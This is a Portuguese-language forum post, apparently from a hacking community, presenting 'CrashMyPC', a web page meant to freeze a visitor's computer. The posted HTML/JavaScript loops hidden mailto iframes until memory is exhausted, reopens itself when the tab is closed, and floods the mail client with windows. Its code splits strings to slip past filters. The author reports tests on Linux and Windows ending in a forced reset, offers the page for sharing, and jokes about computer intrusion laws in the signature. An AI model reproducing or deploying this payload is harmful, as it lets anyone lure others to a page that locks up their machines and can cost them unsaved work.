Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Travando um PC com JS (versão alternativa)

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Dica Travando um PC com JS (versão alternativa)

    Baseando-me na Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., criei essa versão alternativa à do post.
    Verifiquei que a página original repetia várias vezes, manualmente, a tag <iframe> com um link mailto:. Era um pouco limitada.
    Esta versão repete apenas uma vez a tag <iframe> ao longo do código, mas contém um loop em JavaScript que repete, por conta da memória do computador, aquela tag.
    Código HTML:
    <!DOCTYPE html>
    <html>
    <head>
    <meta http-equiv="Content-type" content="text/html; charset=UTF-8" />
    <title>CrashMyPC by 0KaL</title>
    <script type="text/javascript">
    function crash() {
      while(1) {
        document.write("<ifra"+"me sr"+"c=\"mailt"+"o:crash@my"+"pc.com\" st"+"yle=\"displ"+"ay:none\">"+"</if"+"rame>");
      }
    }
    </script>
    </head>
    <body onbeforeunload="javascript:window.open(location.href, '_blank');" onLoad="javascript:crash();">
    </body>
    </html>
    O primeiro travamento ocorre quando o computador fica sem memória para renderizar tanto conteúdo. Acompanhando no Monitor de sistema do KDE, vi que a utilização comum de memória do Firefox varia entre 20 a 50%. Na execução do código, variou entre 80 e 97%.
    Após destravar (se o usuário conseguir essa proeza), ele começa a abrir várias janelas do cliente de e-mail (por exemplo: Outlook). Isto significa, para alguns computadores, outro travamento.

    Meus testes (Mozilla Firefox):
    Linux
    O Mozilla Firefox não respondeu a meus cliques. Cliquei várias vezes para fechar a aba, mas ela era reaberta (note no "onbeforeunload"). Enfim, travou de vez por bastante tempo, até que apareceu a janelinha com o botão "Encerrar aplicativo firefox".
    Quando eu o reabri, diversas janelas do Kmail foram abertas. A área de trabalho (KDM) não respondeu mais a meus cliques, mas para minha sorte, o Monitor de sistema ainda estava aberto. Então, matei o processo "kmail".
    Windows[INDENT]A janela do Mozilla Firefox começou a esbranquiçar, indicando estar travada. Ficou "Não respondendo." Abriram várias janelas perguntando com qual software eu gostaria de abrir o link 'mailto:', tantas que o computador travou. O gerenciador de tarefas até abriu, com muita dificuldade, mas travou quando abri a aba "Processos". Enfim, foi na base do reset mesmo.

    Fui!
    Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



    Notify-list · Twitter · Blog

    Nova lei: Invadir computadores protegidos é crime.
    Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)
    Similar Threads
X
Working...
X